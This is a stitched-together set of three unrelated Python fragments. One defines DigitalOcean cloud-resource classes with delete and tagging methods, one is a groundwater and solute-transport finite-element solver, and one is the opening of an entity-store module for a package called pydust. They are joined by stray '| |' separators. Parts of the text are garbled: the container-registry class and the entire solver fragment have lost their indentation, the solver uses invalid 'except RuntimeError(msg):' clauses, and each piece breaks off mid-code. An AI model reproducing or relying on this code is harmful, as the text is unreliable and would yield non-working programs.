            team = self.account(graph)
            credentials = get_team_credentials(team.id)
            if credentials is None:
                raise RuntimeError(
                    f"Cannot delete resource {self.id}, credentials not found for team {team.id}"
                )
            client = StreamingWrapper(
                credentials.api_token,
                credentials.spaces_access_key,
                credentials.spaces_secret_key,
            )
            return client.delete(delete_uri_path, self.id)
        # Subclasses without a delete_uri_path() must override delete().
        raise NotImplementedError
    def update_tag(self, key: str, value: str) -> bool:
        """Create or replace tag `key` with `value` on this resource."""
        tag_resource_name = self.tag_resource_name()
        if tag_resource_name:
            log.debug(f"Updating tag {key} on resource {self.id}")
            team = self._account
            credentials = get_team_credentials(team.id)
            if credentials is None:
                raise RuntimeError(
                    f"Cannot update tag on resource {self.id}, credentials not found for team {team.id}"
                )
            client = StreamingWrapper(
                credentials.api_token,
                credentials.spaces_access_key,
                credentials.spaces_secret_key,
            )
            if key in self.tags:
                # resotocore knows about the tag. Therefore we need to clean it first
                tag_key = dump_tag(key, self.tags.get(key))
                client.untag_resource(tag_key, tag_resource_name, self.id)
            # we tag the resource using the key-value formatted tag
            tag_kv = dump_tag(key, value)
            tag_ready: bool = True
            tag_count = client.get_tag_count(tag_kv)
            # tag count call failed irrecoverably, we can't continue
            if isinstance(tag_count, str):
                raise RuntimeError(f"Tag update failed. Reason: {tag_count}")
            # tag does not exist, create it
            if tag_count is None:
                tag_ready = client.create_tag(tag_kv)
            return tag_ready and client.tag_resource(tag_kv, tag_resource_name, self.id)
        else:
            raise NotImplementedError(f"resource {self.kind} does not support tagging")
    def delete_tag(self, key: str) -> bool:
        """Remove tag `key` from this resource; GC the tag when unused."""
        tag_resource_name = self.tag_resource_name()
        if tag_resource_name:
            log.debug(f"Deleting tag {key} on resource {self.id}")
            team = self._account
            credentials = get_team_credentials(team.id)
            if credentials is None:
                raise RuntimeError(
                    f"Cannot update tag on resource {self.id}, credentials not found for team {team.id}"
                )
            client = StreamingWrapper(
                credentials.api_token,
                credentials.spaces_access_key,
                credentials.spaces_secret_key,
            )
            if key not in self.tags:
                # tag does not exist, nothing to do
                return False
            tag_key = dump_tag(key, self.tags.get(key))
            untagged = client.untag_resource(tag_key, tag_resource_name, self.id)
            if not untagged:
                return False
            # NOTE(review): update_tag treats a str result from
            # get_tag_count as an error; here a str would compare unequal
            # to 0 and merely skip the GC below — confirm this is intended.
            tag_count = client.get_tag_count(tag_key)
            if tag_count == 0:
                # last user of the tag is gone: delete the tag itself
                return client.delete("/tags", tag_key)
            return True
        else:
            raise NotImplementedError(f"resource {self.kind} does not support tagging")
@dataclass(eq=False)
class DigitalOceanTeam(DigitalOceanResource, BaseAccount): # type: ignore
    """DigitalOcean Team (the account-level resource others belong to)."""
    kind: ClassVar[str] = "digitalocean_team"
@dataclass(eq=False)
class DigitalOceanRegion(DigitalOceanResource, BaseRegion): # type: ignore
    """DigitalOcean region"""
    kind: ClassVar[str] = "digitalocean_region"
    # Region attributes as reported by the DigitalOcean API.
    do_region_slug: Optional[str] = None
    do_region_features: Optional[List[str]] = None
    is_available: Optional[bool] = None
    do_region_droplet_sizes: Optional[List[str]] = None
@dataclass(eq=False)
class DigitalOceanProject(DigitalOceanResource, BaseResource): # type: ignore
    """DigitalOcean project"""
    kind: ClassVar[str] = "digitalocean_project"
    # Project attributes as reported by the DigitalOcean API.
    owner_uuid: Optional[str] = None
    owner_id: Optional[str] = None
    description: Optional[str] = None
    purpose: Optional[str] = None
    environment: Optional[str] = None
    is_default: Optional[bool] = None
    def delete_uri_path(self) -> Optional[str]:
        """API path used by the generic delete()."""
        return "/projects"
@dataclass(eq=False)
class DigitalOceanDroplet(DigitalOceanResource, BaseInstance): # type: ignore
    """A DigitalOcean Droplet Resource
    Droplet have a class variable `instance_status_map` which contains
    a mapping from the droplet status string the cloud API returns
    to our internal InstanceStatus state.
    """
    kind: ClassVar[str] = "digitalocean_droplet"
    instance_status_map: ClassVar[Dict[str, InstanceStatus]] = {
        "new": InstanceStatus.BUSY,
        "active": InstanceStatus.RUNNING,
        "off": InstanceStatus.TERMINATED,
        "archive": InstanceStatus.TERMINATED,
    }
    # Droplet attributes as reported by the DigitalOcean API.
    droplet_backup_ids: Optional[List[str]] = None
    is_locked: Optional[bool] = None
    droplet_features: Optional[List[str]] = None
    droplet_image: Optional[str] = None
    def delete_uri_path(self) -> Optional[str]:
        """API path used by the generic delete()."""
        return "/droplets"
    def _instance_status_setter(self, value: str) -> None:
        """Setter that looks up the instance status
        Based on the string that was given we're doing a dict lookup
        for the corresponding instance status and assign it or
        InstanceStatus.UNKNOWN.
        """
        self._instance_status = self.instance_status_map.get(
            value, InstanceStatus.UNKNOWN
        )
    def tag_resource_name(self) -> Optional[str]:
        """Name used by the tagging API for droplets."""
        return "droplet"
# Because we are using dataclasses and allow to supply the `instance_status`
# string to the constructor we can not use the normal @property decorator.
# Instead we assign the property once the class has been fully defined.
DigitalOceanDroplet.instance_status = property(
    DigitalOceanDroplet._instance_status_getter,
    DigitalOceanDroplet._instance_status_setter,
)
@dataclass(eq=False)
class DigitalOceanKubernetesCluster(DigitalOceanResource, BaseResource): # type: ignore
    """DigitalOcean Kubernetes Cluster"""
    kind: ClassVar[str] = "digitalocean_kubernetes_cluster"
    # Cluster attributes as reported by the DigitalOcean API.
    k8s_version: Optional[str] = None
    k8s_cluster_subnet: Optional[str] = None
    k8s_service_subnet: Optional[str] = None
    ipv4_address: Optional[str] = None
    endpoint: Optional[str] = None
    auto_upgrade_enabled: Optional[bool] = None
    cluster_status: Optional[str] = None
    surge_upgrade_enabled: Optional[bool] = None
    registry_enabled: Optional[bool] = None
    ha_enabled: Optional[bool] = None
    def delete_uri_path(self) -> Optional[str]:
        """API path used by the generic delete()."""
        return "/kubernetes/clusters"
@dataclass(eq=False)
class DigitalOceanVolume(DigitalOceanResource, BaseVolume): # type: ignore
    """DigitalOcean block-storage volume."""
    kind: ClassVar[str] = "digitalocean_volume"
    # Maps the volume status string returned by the cloud API to the
    # internal VolumeStatus state (parallel to the droplet status map).
    volume_status_map: ClassVar[Dict[str, VolumeStatus]] = {
        "creating": VolumeStatus.BUSY,
        "available": VolumeStatus.AVAILABLE,
        "in-use": VolumeStatus.IN_USE,
        "deleting": VolumeStatus.BUSY,
        "deleted": VolumeStatus.DELETED,
        "error": VolumeStatus.ERROR,
        "busy": VolumeStatus.BUSY,
    }
    # Volume attributes as reported by the DigitalOcean API.
    description: Optional[str] = None
    filesystem_type: Optional[str] = None
    filesystem_label: Optional[str] = None
    def delete_uri_path(self) -> Optional[str]:
        """API path used by the generic delete()."""
        return "/volumes"
    def _volume_status_setter(self, value: str) -> None:
        """Map the API status string to VolumeStatus (UNKNOWN if unmapped)."""
        self._volume_status = self.volume_status_map.get(value, VolumeStatus.UNKNOWN)
    def tag_resource_name(self) -> Optional[str]:
        """Name used by the tagging API for volumes."""
        return "volume"
# Assigned after class definition for the same dataclass reason as
# DigitalOceanDroplet.instance_status.
DigitalOceanVolume.volume_status = property(
    DigitalOceanVolume._volume_status_getter, DigitalOceanVolume._volume_status_setter
)
@dataclass(eq=False)
class DigitalOceanDatabase(DigitalOceanResource, BaseDatabase): # type: ignore
    """DigitalOcean managed database."""
    kind: ClassVar[str] = "digitalocean_database"
    def delete_uri_path(self) -> Optional[str]:
        """API path used by the generic delete()."""
        return "/databases"
    def tag_resource_name(self) -> Optional[str]:
        """Name used by the tagging API for databases."""
        return "database"
@dataclass(eq=False)
class DigitalOceanNetwork(DigitalOceanResource, BaseNetwork): # type: ignore
    """DigitalOcean network
    This is what instances and other networking related resources might reside in.
    """
    kind: ClassVar[str] = "digitalocean_network"
    # VPC attributes as reported by the DigitalOcean API.
    ip_range: Optional[str] = None
    description: Optional[str] = None
    is_default: Optional[bool] = None
    def delete_uri_path(self) -> Optional[str]:
        """API path used by the generic delete()."""
        return "/vpcs"
@dataclass(eq=False)
class DigitalOceanSnapshot(DigitalOceanResource, BaseSnapshot): # type: ignore
    """DigitalOcean snapshot"""
    kind: ClassVar[str] = "digitalocean_snapshot"
    # Snapshot attributes as reported by the DigitalOcean API.
    snapshot_size_gigabytes: Optional[int] = None
    resource_id: Optional[str] = None
    resource_type: Optional[str] = None
    def delete_uri_path(self) -> Optional[str]:
        """API path used by the generic delete()."""
        return "/snapshots"
    def tag_resource_name(self) -> Optional[str]:
        """Name used by the tagging API for volume snapshots."""
        return "volume_snapshot"
@dataclass(eq=False)
class DigitalOceanLoadBalancer(DigitalOceanResource, BaseLoadBalancer): # type: ignore
    """DigitalOcean load balancer"""
    kind: ClassVar[str] = "digitalocean_load_balancer"
    # Load-balancer attributes as reported by the DigitalOcean API.
    nr_nodes: Optional[int] = None
    loadbalancer_status: Optional[str] = None
    redirect_http_to_https: Optional[bool] = None
    enable_proxy_protocol: Optional[bool] = None
    enable_backend_keepalive: Optional[bool] = None
    disable_lets_encrypt_dns_records: Optional[bool] = None
    def delete_uri_path(self) -> Optional[str]:
        """API path used by the generic delete()."""
        return "/load_balancers"
@dataclass(eq=False)
class DigitalOceanFloatingIP(DigitalOceanResource, BaseIPAddress): # type: ignore
    """DigitalOcean floating IP"""
    kind: ClassVar[str] = "digitalocean_floating_ip"
    is_locked: Optional[bool] = None
    def delete(self, graph: Graph) -> bool:
        """Unassign and then delete this floating IP.

        Overrides the generic delete() because the IP must be detached from
        any droplet before the API accepts the deletion.
        """
        log.debug(
            f"Deleting resource {self.id} in account {self.account(graph).id} region {self.region(graph).id}"
        )
        team = self.account(graph)
        credentials = get_team_credentials(team.id)
        if credentials is None:
            raise RuntimeError(
                f"Cannot delete resource {self.id}, credentials not found for team {team.id}"
            )
        client = StreamingWrapper(
            credentials.api_token,
            credentials.spaces_access_key,
            credentials.spaces_secret_key,
        )
        # un-assign the ip just in case it's still assigned to a droplet
        client.unassign_floating_ip(self.id)
        return client.delete("/floating_ips", self.id)
@dataclass(eq=False)
class DigitalOceanImage(DigitalOceanResource, BaseResource): # type: ignore
    """DigitalOcean image"""

    kind: ClassVar[str] = "digitalocean_image"
    # Distribution name (e.g. an OS distribution string from the API).
    distribution: Optional[str] = None
    image_slug: Optional[str] = None
    is_public: Optional[bool] = None
    # Minimum disk size required to use this image, per the API.
    min_disk_size: Optional[int] = None
    image_type: Optional[str] = None
    size_gigabytes: Optional[int] = None
    description: Optional[str] = None
    image_status: Optional[str] = None

    def delete_uri_path(self) -> Optional[str]:
        """Return the API path used to delete images."""
        return "/images"

    def tag_resource_name(self) -> Optional[str]:
        """Return the resource name string used by the tagging API."""
        return "image"
@dataclass(eq=False)
class DigitalOceanSpace(DigitalOceanResource, BaseBucket): # type: ignore
    """DigitalOcean space"""

    kind: ClassVar[str] = "digitalocean_space"

    def delete(self, graph: Graph) -> bool:
        """Delete this Space (object-storage bucket) via the Spaces API.

        :raises RuntimeError: when no credentials exist for the owning team.
        """
        log.debug(
            f"Deleting space {self.id} in account {self.account(graph).id} region {self.region(graph).id}"
        )
        team = self.account(graph)
        credentials = get_team_credentials(team.id)
        if credentials is None:
            raise RuntimeError(
                f"Cannot delete resource {self.id}, credentials not found for team {team.id}"
            )
        client = StreamingWrapper(
            credentials.api_token,
            credentials.spaces_access_key,
            credentials.spaces_secret_key,
        )
        # Spaces deletion is region-scoped, so the region id is passed along.
        return client.delete_space(self.region(graph).id, self.id)
@dataclass(eq=False)
class DigitalOceanApp(DigitalOceanResource, BaseResource): # type: ignore
    """DigitalOcean app"""

    kind: ClassVar[str] = "digitalocean_app"
    # Pricing/size tier slug of the app.
    tier_slug: Optional[str] = None
    default_ingress: Optional[str] = None
    live_url: Optional[str] = None
    live_url_base: Optional[str] = None
    live_domain: Optional[str] = None

    def delete_uri_path(self) -> Optional[str]:
        """Return the API path used to delete apps."""
        return "/apps"
@dataclass(eq=False)
class DigitalOceanCdnEndpoint(DigitalOceanResource, BaseEndpoint): # type: ignore
    """DigitalOcean CDN endpoint"""

    # ClassVar annotation keeps `kind` out of the dataclass fields and matches
    # the declaration style of all sibling resource classes in this module.
    kind: ClassVar[str] = "digitalocean_cdn_endpoint"
    # Origin server the CDN pulls content from.
    origin: Optional[str] = None
    # Fully qualified CDN endpoint address.
    endpoint: Optional[str] = None
    certificate_id: Optional[str] = None
    custom_domain: Optional[str] = None
    # Cache TTL in seconds, as reported by the API.
    ttl: Optional[int] = None

    def delete_uri_path(self) -> Optional[str]:
        """Return the API path used to delete CDN endpoints."""
        return "/cdn/endpoints"
@dataclass(eq=False)
class DigitalOceanCertificate(DigitalOceanResource, BaseCertificate): # type: ignore
    """DigitalOcean certificate"""

    # ClassVar annotation keeps `kind` out of the dataclass fields and matches
    # the declaration style of all sibling resource classes in this module.
    kind: ClassVar[str] = "digitalocean_certificate"
    # Certificate lifecycle state string from the API.
    certificate_state: Optional[str] = None
    certificate_type: Optional[str] = None

    def delete_uri_path(self) -> Optional[str]:
        """Return the API path used to delete certificates."""
        return "/certificates"
@dataclass(eq=False)
class DigitalOceanContainerRegistry(DigitalOceanResource, BaseResource): # type: ignore
"""DigitalOcean container registry"""
kind = "digitalocean_container_registry"
storage_usage_bytes: Optional[int] = None
is_read_only: Optional[bool] = None
def delete(self, graph: Graph) -> bool:
"""Delete the container registry from the cloud"""
log.debug(
f"Deleting registry {self.id} in account {self.account(graph).id} region {self.region(graph).id}"
)
team = self.account(graph)
credentials = get_team_credentials(team.id)
if credentials is None:
raise RuntimeError(
f"Cannot delete resource {self.id}, credentials not found for team {team.id}"
)
client = StreamingWrapper(
credentials.api_token,
credentials.spaces_access_key,
| |
concentration, rho_f,
phi, diffusivity, l_disp, t_disp,
solute_source,
specific_storage,
k_tensor, k_vector,
dispersion_tensor,
viscosity,
gamma, alpha,
fluid_source,
rho_f_0,
specified_pressure_bnd,
specified_pressure,
specified_concentration_bnd,
specified_concentration,
specified_concentration_rho_f,
rch_bnd_loc,
recharge_mass_flux,
coupled_iterations=True,
solute_transport=True,
heat_transport=False,
steady_state=False,
proj=None,
drain_loc=None,
seepage_bnd=False,
recalculate_seepage_bnd=True,
active_seepage_bnd=None,
concentration_bnd_inflow_only=False,
concentration_bnd_inflow_direction='up',
max_allowed_CFL_number=None,
force_CFL_timestep=False,
dt_max=None,
calculate_viscosity=False,
verbose=False,
iterate_seepage_in_one_timestep=False,
max_seepage_iterations=50,
ignore_convergence_failure=False):
"""
Iterative solve groundwater flow, solute transport and heat flow equations.
solves either steady state or 1 timestep in implicit or explicit mode
iterative coupling scheme of solute transport, pressure & flow eqs. and
eqs of state follows Ackerer (2004), Geophysical Research Letters 31(12)
Parameters
---------
mesh :
escript mesh object
pressure_pde :
groundwater flow PDE
solute_pde
solute transport PDE
pressure_convergence_criterion : float
convergence criterion groundwater flow eq. (Pa)
concentration_convergence_criterion : float
convergence criterion solute transport eq. (kg/kg)
max_iterations : int
max number of iterations
dt : int
timestep
g_vector :
gravity vector (0,g)
pressure :
pressure (Pa)
concentration :
solute concentration (kg/kg)
rho_f :
fluid density (kg / m3)
phi :
porosity
D :
solute diffusivity (...)
l_disp :
longitudinal dispersivity (...)
t_disp :
transverse dispersivity (...)
solute_source :
solute source (units...)
specific_storage :
specific storativity (...)
k :
permeability (m2)
anisotropy :
permeability anisotropy = horizontal/vertical permeability
(dimensionless)
viscosity :
viscosity (...)
gamma :
?
alpha :
?
fluid_source :
fluid source term (...)
rho_f_0
fluid density at solute concentration C=0 (kg/m3)
specified_pressure_bnd
location of specified pressure boundary
specified_pressure
specified pressure (Pa)
specified_concentration_bnd
location of specified concentration boundary
specified_concentration
specified concentration (kg/kg)
rch_bnd_loc :
recharge_mass_flux : float
coupled_iterations : bool, optional
couple groundwater and solute transport equations iteratively
by adjusting density term
solute_transport : bool, optional
if True, simulate solute transport
heat_transport : bool, optional
if True, simulate heat transport
steady_state : bool, optional
True for steady state groundwater flow, False for transient
verbose : bool, optional
verbose text output
drain_loc :
location of drain boundary nodes
debug : bool, optional
debugging
dt_max : float?
=None ...
proj :
escript PDE for projecting element data to nodes
seepage_optimization_automated : boolean
Returns
-------
pressure_t2_i2 :
pressure at next timestep (t2) and last iteration (i2)
concentration_t2_i2 :
solute concentration (kg/kg)
rho_f_t2_i2 :
fluid density
iteration : int
number of iterations
dt_max :
max timestep size
"""
# calculate transverse dispersivity
#t_disp = l_disp * disp_ratio
year = 365.25 *24 * 60 * 60.
if verbose is True:
print('running iterative solver for pressure and concentration PDEs')
if coupled_iterations is False:
print('pressure and concentration are not coupled')
#pressure_new = pressure
pressure_old_ts = pressure
concentration_old_ts = concentration
fluid_density_new = fluid_density_old = rho_f
#pressure_t1 = pressure.copy()
#concentration_t1 = concentration.copy()
# added 22 jun 2016, not sure if this is ok:
active_rch_bnd = rch_bnd_loc
if coupled_iterations is True and calculate_viscosity is True:
viscosity_new = calculate_viscosity_simple(concentration)
else:
viscosity_new = viscosity
active_specified_concentration_bnd = specified_concentration_bnd
iteration = 0
converged = False
non_convergence = False
ele_size = None
q = None
v = None
while converged is False and non_convergence is False:
if verbose is True:
print('iteration ', iteration)
if iteration > 0:
print('pressure convergence ', es.Lsup(pressure_conv))
if solute_transport is True:
# get flux
q = calculate_q(k_vector, viscosity_new, pressure_old_ts,
fluid_density_new, g_vector)
v = q / phi
# calculate new solute concentration
concentration_old_iteration = concentration
# finite element solute transport
if concentration_bnd_inflow_only is True and iteration == 0:
# only apply concentration bnd for inflow into model domain
# assumes a horizontal model bnd
# TODO: calculate flux normal to model boundary to account
# for non-horizontal upper boundaries
proj.setValue(D=es.kronecker(mesh), Y=q)
try:
nodal_q = proj.getSolution()
except RuntimeError(msg):
print('error, non-convergence')
print(msg)
non_convergence = True
nodal_q_norm = rotate_vector_escript(nodal_q, topo_gradient)
nodal_v = nodal_q / phi
if concentration_bnd_inflow_direction == 'up':
inflow_bnd = (es.whereNegative(nodal_q_norm[1]) *
specified_concentration_bnd)
elif concentration_bnd_inflow_direction == 'down':
inflow_bnd = (es.wherePositive(nodal_q_norm[1]) *
specified_concentration_bnd)
elif concentration_bnd_inflow_direction == 'left':
inflow_bnd = (es.wherePositive(nodal_q[0]) *
specified_concentration_bnd)
elif concentration_bnd_inflow_direction == 'right':
inflow_bnd = (es.whereNegative(nodal_q[0]) *
specified_concentration_bnd)
if es.sup(inflow_bnd) > 0:
active_specified_concentration_bnd = inflow_bnd
else:
min_x = es.inf(
specified_concentration_bnd *
specified_concentration_bnd.getDomain().getX()[0])
active_specified_concentration_bnd = \
(specified_concentration_bnd *
es.whereZero(
specified_concentration_bnd.getDomain().getX()[0]
- min_x))
if verbose is True:
print('warning, outflow for all specified ' \
'concentration boundary nodes')
#print 'using entire bnd instead'
#active_specified_concentration_bnd = \
# specified_concentration_bnd
print('using first node as fixed conc bnd instead')
print('number of active conc bnd nodes:')
print(np.sum(np.array(
active_specified_concentration_bnd.
toListOfTuples())))
if verbose is True:
import grompy_lib
xyi, ia = grompy_lib.convert_to_array(
active_specified_concentration_bnd)
xyc, ca = grompy_lib.convert_to_array(
specified_concentration_bnd)
print('inflow conc bnd nodes = %0.0f / %0.0f' \
% (ia.sum(), ca.sum()))
print('x = %0.3f - %0.3f' % (xyi[ia == 1, 0].min(),
xyi[ia == 1, 0].max()))
print('qv conc bnd: ', (nodal_q[1] *
specified_concentration_bnd))
#solute_pde.setValue(D=1,
# r=specified_concentration_rho_f,
# q=active_specified_concentration_bnd)
solute_pde.setValue(D=1,
r=specified_concentration,
q=active_specified_concentration_bnd)
solute_pde = update_solute_transport_pde(
mesh, solute_pde,
concentration_old_ts, v, dt, solute_source,
dispersion_tensor,
diffusivity, l_disp, t_disp, fluid_density_old)
try:
#solute_mass = solute_pde.getSolution()
concentration = solute_pde.getSolution()
except RuntimeError(error_msg):
print('!! runtime error ', error_msg)
print('solver options: ')
print(solute_pde.getSolverOptions().getSummary())
non_convergence = True
#raise RuntimeError(error_msg)
# calculate concentration, using new solute mass and eq of state
#concentration_new = calculate_concentration(
# solute_mass, rho_f_0, gamma)
#concentration_new = solve_solute_transport_v2(
# solute_pde, mesh,
# steady_state,
# concentration_t1, v, dt, solute_source,
# diffusivity, l_disp, t_disp, fluid_density_old,
# rho_f_0, gamma)
concentration_change_rate = \
(concentration - concentration_old_ts) / dt
else:
# no solute transport:
concentration_change_rate = 0
if heat_transport is True:
# no temperature in models yet:
temperature_change_rate = 0
else:
# no heat transport:
temperature_change_rate = 0
if coupled_iterations is True:
if verbose is True:
print('recalculating fluid density and viscosity')
# recalculate fluid density
fluid_density_old = fluid_density_new
fluid_density_new = \
calculate_fluid_density(concentration, gamma, rho_f_0)
if calculate_viscosity is True:
viscosity_new = \
calculate_viscosity_simple(concentration)
else:
# leave fluid density unchanged
concentration_change_rate = 0
temperature_change_rate = 0
# store old pressure
pressure_old_iteration = pressure
if drain_loc is None or es.sup(drain_loc) == 0:
# calculate pressure, no drain or seepage bnd
pressure_pde = \
update_pressure_pde(pressure_pde,
pressure_old_ts,
phi, specific_storage,
k_tensor, k_vector,
fluid_density_new,
viscosity_new, dt,
rch_bnd_loc,
recharge_mass_flux,
fluid_source, g_vector,
gamma, concentration_change_rate,
alpha, temperature_change_rate)
try:
pressure = pressure_pde.getSolution()
except RuntimeError(msg):
print('error, non-convergence')
print(msg)
non_convergence = True
#print 'no seepage bnd'
else:
# implement drain or seepage boundary
if seepage_bnd is True:
## use seepage boundary:
if active_seepage_bnd is None:
# calculate pressure without any drain boundary
pressure_pde.setValue(r=specified_pressure,
q=specified_pressure_bnd)
active_rch_bnd = rch_bnd_loc
else:
# incorporate active drain bnd of previous timestep
specified_pressure_bnd_mod = \
es.wherePositive(
specified_pressure_bnd + active_seepage_bnd)
pressure_pde.setValue(r=specified_pressure,
q=specified_pressure_bnd_mod)
# do not change active rch bnd
active_rch_bnd = rch_bnd_loc
#active_rch_bnd = rch_bnd_loc * \
# es.whereZero(specified_pressure_bnd)
#specified_flux = rch_bnd_loc * dt * recharge_mass_flux
# calculate pressure with existing seepage bnd
pressure_pde = \
update_pressure_pde(pressure_pde,
pressure_old_ts,
phi, specific_storage,
k_tensor, k_vector,
fluid_density_new,
viscosity_new, dt,
active_rch_bnd, recharge_mass_flux,
fluid_source, g_vector,
gamma, concentration_change_rate,
alpha, temperature_change_rate)
try:
pressure = pressure_pde.getSolution()
except RuntimeError:
print("error, pressure PDE solver failed")
converged = True
non_convergence = True
#if pressure_new not in locals():
# pressure_new = pressure_t1
# assign drain bnd nodes
if active_seepage_bnd is None:
active_seepage_bnd = \
es.wherePositive(drain_loc * pressure)
if iteration < max_seepage_iterations and recalculate_seepage_bnd is True:
# adjust seepage boundary, but only for first x iterations
# to avoid instability
if verbose is True:
seepage_xy = active_seepage_bnd.getDomain().getX()
seepage_nodes_xy = \
np.array(seepage_xy.toListOfTuples())
seepage_array = np.array(
active_seepage_bnd.toListOfTuples())
ind = seepage_array > 0
print('\tbefore adjustment:')
print('\tactive seepage bnd from x=%0.0f to %0.0f m' \
% (seepage_nodes_xy[ind, 0].min(),
seepage_nodes_xy[ind, 0].max()))
# remove seepage nodes that have become source of water
q = calculate_q(k_vector, viscosity_new, pressure,
fluid_density_new, g_vector)
proj.setValue(D=es.kronecker(mesh), Y=q)
try:
nodal_q = proj.getSolution()
except RuntimeError(msg):
print('error, non-convergence')
print(msg)
non_convergence = True
# calculate max vertical flux into the model domain at
# drain bnd nodes
# -> not possible, cannot mix face elements and normal elements
# later on to adjust seepage...
#nodal_q_norm = nodal_q * nodal_q.getDomain().getNormal()
#
nodal_q_norm = rotate_vector_escript(nodal_q, topo_gradient)
#flux_seepage_bnd = active_seepage_bnd * nodal_q[1]
flux_seepage_bnd = active_seepage_bnd * nodal_q_norm[1]
#flux_seepage_bnd_corr = flux_seepage_bnd +
seepage_change_buffer = 1e-3 / year
seepage_inflow_nodes = \
es.whereNegative(flux_seepage_bnd
+ recharge_mass_flux
/ fluid_density_new)
if verbose is True:
print('\tflux seepage | |
# Repository: MondoAurora/pydust
import json
import os
import yaml
import traceback
import inspect
import deepdiff
from enum import Enum
from collections import namedtuple
from datetime import datetime
from dust import Datatypes, ValueTypes, Operation, MetaProps, FieldProps, Committed
from importlib import import_module
import threading
# Hook slot filled in by the messages module; when set, entity accesses are reported.
_messages_create_message = None
# Re-entrant lock guarding all access to the global store state.
_store_lock = threading.RLock()
# Names and numeric ids of the two built-in bootstrap units.
UNIT_ENTITY = "entity"
UNIT_ENTITY_META = "entity_meta"
UNIT_ID = 1
UNIT_META_ID = 2
class UnitMeta(MetaProps):
    """Meta fields of a unit entity: its name, id counter and meta types.

    Tuple layout follows MetaProps: (datatype, valuetype, ...); the two
    trailing ints appear to be the field id and a global order value —
    TODO confirm against the MetaProps definition in dust.
    """
    name = (Datatypes.STRING, ValueTypes.SINGLE, 1, 100)
    id_cnt = (Datatypes.INT, ValueTypes.SINGLE, 2, 101)
    meta_types = (Datatypes.ENTITY, ValueTypes.SET, 3, 102)
class TypeMeta(MetaProps):
    """Meta fields of a type entity: its name and the set of its fields."""
    name = (Datatypes.STRING, ValueTypes.SINGLE, 1, 200)
    fields = (Datatypes.ENTITY, ValueTypes.SET, 2, 201)
class MetaField(MetaProps):
    """Meta fields describing a single field: name, global name, and order."""
    name = (Datatypes.STRING, ValueTypes.SINGLE, 1, 300)
    global_name = (Datatypes.STRING, ValueTypes.SINGLE, 2, 301)
    field_order = (Datatypes.INT, ValueTypes.SINGLE, 3, 302)
class EntityBaseMeta(MetaProps):
    """Bookkeeping fields stored for every entity: owning unit, meta type,
    numeric id and commit state."""
    unit = (Datatypes.ENTITY, ValueTypes.SINGLE, 1, 400)
    meta_type = (Datatypes.ENTITY, ValueTypes.SINGLE, 2, 401)
    entity_id = (Datatypes.INT, ValueTypes.SINGLE, 3, 402)
    # fixed "4 ,403" -> "4, 403": formatting made consistent with siblings
    committed = (Datatypes.STRING, ValueTypes.SINGLE, 4, 403)
class EntityTypes(FieldProps):
    """Core entity types of the built-in meta unit.

    Tuple layout appears to be (unit name, fields enum, type id) — accessed
    elsewhere as .unit_name / .fields_enum / .id_value; TODO confirm against
    the FieldProps definition in dust.
    """
    type_meta = (UNIT_ENTITY_META, TypeMeta, 1)
    _entity_base = (UNIT_ENTITY_META, EntityBaseMeta, 2)
    unit = (UNIT_ENTITY_META, UnitMeta, 3)
    meta_field = (UNIT_ENTITY_META, MetaField, 4)
def get_unit_deps_tuple(module_name, unit_name, meta_type_enums):
    """Resolve a unit declaration from a module by attribute names.

    Imports *module_name* and returns a 3-tuple of: the attribute named
    *unit_name*, the attribute named *meta_type_enums*, and the module's
    optional ``get_unit_dependencies`` callable (``None`` when absent).
    """
    mod = import_module(module_name)
    return (
        getattr(mod, unit_name),
        getattr(mod, meta_type_enums),
        getattr(mod, "get_unit_dependencies", None),
    )
def compare_entity_to_json_simple(meta_type_enum, entity, json_entity, json_entity_map, compare_sub_entity_fields, log_prefix=""):
    """Compare a store entity against its JSON representation, field by field.

    Returns a dict mapping (prefixed) field names to {orig/new value} pairs
    for every field whose value differs. Sub-entities are compared
    recursively, but only for fields listed in *compare_sub_entity_fields*
    (a mapping from field to the sub-entity's fields enum).
    """
    changed = {}
    for field in meta_type_enum.fields_enum:
        if field.valuetype == ValueTypes.SINGLE:
            if field.datatype == Datatypes.ENTITY:
                if compare_sub_entity_fields and field in compare_sub_entity_fields:
                    orig_value = entity.access(Operation.GET, None, field)
                    #print(field.name+"-"+str(orig_value)+"-"+str(_entity_map[entity.global_id()][0]))
                    new_value = None
                    new_entity_global_id = json_entity.get(Store.get_global_fieldname(field))
                    if new_entity_global_id:
                        new_value = json_entity_map[new_entity_global_id]
                    #print(str(new_value))
                    # one side present, the other missing -> record the diff
                    if orig_value is None and not new_value is None or not orig_value is None and new_value is None:
                        changed[log_prefix+field.name] = {"orig_value": orig_value, "new_value": new_value}
                    elif not orig_value is None and not new_value is None:
                        # both present: recurse into the sub-entity
                        changed.update(compare_entity_to_json_simple(compare_sub_entity_fields[field], orig_value, new_value, json_entity_map, None, log_prefix="{}#".format(field.name)))
            else:
                # plain scalar field: record when either side is missing or values differ
                if ( json_entity is None and not entity is None ) or ( not json_entity is None and entity is None ) or \
                    json_entity and entity.access(Operation.GET, None, field) != json_entity.get(Store.get_global_fieldname(field)):
                    changed[log_prefix+field.name] = {"orig_value": entity.access(Operation.GET, None, field), "new_value": json_entity.get(Store.get_global_fieldname(field))}
        elif field.valuetype == ValueTypes.SET or field.valuetype == ValueTypes.LIST or field.valuetype == ValueTypes.MAP:
            if field.datatype != Datatypes.ENTITY:
                # collection of scalars: compare structurally, order-insensitive
                iter1 = entity.access(Operation.GET, None, field)
                iter2 = json_entity.get(Store.get_global_fieldname(field))
                # NOTE(review): the chained comparison below makes the first
                # `field.valuetype ==` term always true; presumably a single
                # `field.valuetype == ValueTypes.SET` was intended — confirm.
                if field.valuetype == field.valuetype == ValueTypes.SET and iter2:
                    iter2 = set(iter2)
                dd = deepdiff.DeepDiff(iter1, iter2, ignore_order=True)
                if dd:
                    changed[log_prefix+field.name] = {"orig_value": entity.access(Operation.GET, None, field), "new_value": json_entity.get(Store.get_global_fieldname(field))}
            elif field.valuetype == ValueTypes.SET or field.valuetype == ValueTypes.LIST:
                if compare_sub_entity_fields and field in compare_sub_entity_fields:
                    orig_value_global_ids = entity.access(Operation.GET, None, field)
                    new_entity_global_ids = json_entity.get(Store.get_global_fieldname(field))
                    # at this point we only have unordered ids, so we have to compare everything to everything and fail as early as possible
                    if not orig_value_global_ids and new_entity_global_ids or not new_entity_global_ids and orig_value_global_ids or len(orig_value_global_ids) != len(new_entity_global_ids):
                        changed[log_prefix+field.name] = {"orig_list_value": list(orig_value_global_ids), "new_list_value": list(new_entity_global_ids)}
                    else:
                        # Same number of entries
                        no_match_found = False
                        match_to = list(new_entity_global_ids)
